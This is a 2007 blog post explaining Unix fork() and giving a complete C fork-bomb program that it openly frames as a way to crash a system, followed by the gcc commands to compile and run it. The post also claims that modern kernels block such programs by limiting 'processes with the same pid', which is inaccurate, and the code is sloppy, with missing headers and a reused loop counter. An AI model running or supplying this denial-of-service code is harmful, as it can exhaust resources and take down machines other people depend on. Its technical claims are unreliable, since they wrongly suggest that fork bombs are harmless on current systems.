Fork bombing in C

by Giulio on Sep 04, 2007 and filed under Operating Systems/Linux/Customization

Many attacks to different systems just want to make it crash. A good way of accomplishing that task is to create a fork of some application and let it duplicate... forever!

This way, the system will of course crash and some other damage can be done. However, the most recent kernels of Operating System are able to break a fork process almost immediately, since a maximum number of processes with the same pid is allowed.

Chain reaction

What results from forks of processes are other processes perfectly identical to the original one.
So, if we got a main process, we can clone it until a certain limit is reached or... forever.
What reported until here easily applies to almost every programming language but, from here on, some C functions are used to explain the process better.

On Unix machines, the fork() function creates a child starting from a parent and gives the child the same parent's characteristics and instructions.

Applying

Generally, a fork porcess is something like

pid_t proc;

proc = fork ();

if (proc == 0)
    // Child
else
    // Parent

This snippet should make clear the fork() method creates 2 processes: the parent (which applies for the else) and the child executing if proc returns 0.

A better fork program

That was what our final application should look like: the main methods where reported.
But our aim is to make lots and lots of process, to crash the system (even if, nowadays, it's impossible with a forking)!

So, here's the complete C program

// File: forkbombing.c
#include <sys/types.h>

int main ()
{
    // Process identifier

    pid_t proc;
    int i;

    // Children generation
    for (i=0; i<100; i++) {
        // Children will follow this way

        proc = fork ();

        if (proc == 0) {
        printf("I'm a child and will create my children!\n");

        // Children's children (original parent's grandchildren :)
        for (i=0; i<100; i++)

            proc = fork ();
        }
        else {
            // Parent will follow this way
            printf ("I'm the parent.\n");
        }
    }
}

Of course it won't run because of the kernel patches I told you before, but you can replace 100 with a very lower number to see if something happens.

To compile it, use gcc as follows

$ gcc -Wall -o forkbombing forkbombing.c
$ ./forkbombing